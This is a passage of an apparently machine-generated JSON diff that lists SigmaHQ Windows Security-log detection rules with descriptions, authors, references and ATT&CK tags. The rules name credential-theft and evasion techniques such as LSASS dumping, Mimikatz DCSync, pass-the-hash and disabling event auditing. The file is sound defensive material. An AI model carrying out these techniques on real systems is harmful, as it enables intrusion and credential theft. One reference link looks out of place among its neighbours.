"uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation" + }, + { + "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dot_net_etw_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "ETW Logging Disabled In .NET Processes - Registry" + }, + { + "description": "Detects handles requested to SAM registry hive", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sam_registry_hive_handle_request.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "value": "SAM Registry Hive Handle Request" + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_syskey_registry_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access" + }, + { + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Programs that connect locally to the RDP port" + ], + "filename": "win_security_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "value": "RDP over Reverse SSH Tunnel WFP" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access" + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "meta": { + "author": "sigma", + "creation_date": "2017/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_lsass_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "value": "Password Dumper Activity on LSASS" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_teams_suspicious_objectaccess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event" + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_enable_weak_encryption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://adsecurity.org/?p=2053", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast" + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_user_added_to_local_administrators.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators" + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_hidden_user_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation" + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags" + }, + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)" + }, + { + "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", + "meta": { + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "creation_date": "2020/08/06", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_smb_file_creation_admin_shares.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", + "value": "SMB Create Remote File Admin Share" + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_camera_microphone_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam" + }, + { + "description": "Detect PetitPotam coerced authentication activity.", + "meta": { + "author": "Mauricio Velazco, Michael Haag", + "creation_date": "2021/09/02", + "falsepositive": [ + "Unknown. Feedback welcomed." + ], + "filename": "win_security_petitpotam_network_share.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", + "https://github.com/topotam/PetitPotam", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1187" + ] + }, + "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "value": "Possible PetitPotam Coerce Authentication Attempt" + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_disable_event_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing" + }, + { + "description": "Detects access to a domain user from a non-machine account", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2020/03/30", + "falsepositive": [ + "Administrators configuring new users." + ], + "filename": "win_security_ad_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration" + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_ad_user_backdoors.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors" + }, + { + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "meta": { + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "creation_date": "2018/02/12", + "falsepositive": [ + "Runas command-line tool using /netonly parameter" + ], + "filename": "win_security_overpass_the_hash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" + ] + }, + "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "value": "Successful Overpass the Hash Attempt" + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "meta": { + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + ], + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ] + }, + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added" + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mal_wceaux_dll.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ] + }, + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_cobaltstrike_service_installs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.sans.org/webcasts/119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security" + }, + { + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" + ], + "tags": "No established tags" + }, + "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "value": "Suspicious Computer Account Name Change CVE-2021-42287" + }, + { + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Legitimate extension of domain structure" + ], + "filename": "win_security_susp_add_domain_trust.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", + "value": "Addition of Domain Trusts" + }, + { + "description": "Detects Mimikatz DC sync security events", + "meta": { + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "creation_date": "2018/06/03", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "filename": "win_security_dcsync.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ] + }, + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync" + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/19", + "falsepositive": [ + "User using a disabled account" + ], + "filename": "win_security_susp_failed_logon_reasons.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons" + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_service_installation_by_unusal_client.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1490608838701166596", + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "value": "Service Installed By Unusual Client - Security" + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_active_directory_user_control.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects" + }, + { + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "meta": { + "author": "elhoim", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_computer_name.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", + "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", + "https://twitter.com/malmoeb/status/1511760068743766026", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" + ], + "tags": [ + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "value": "Win Susp Computer Name Containing Samtheadmin" + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_update.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update" + }, + { + "description": "Detect remote login by Administrator user (depending on internal pattern).", + "meta": { + "author": "juju4", + "creation_date": "2017/10/29", + "falsepositive": [ + "Legitimate administrative activity." + ], + "filename": "win_security_admin_rdp_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ] + }, + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon" + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "INIT_6", + "creation_date": "2021/07/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": 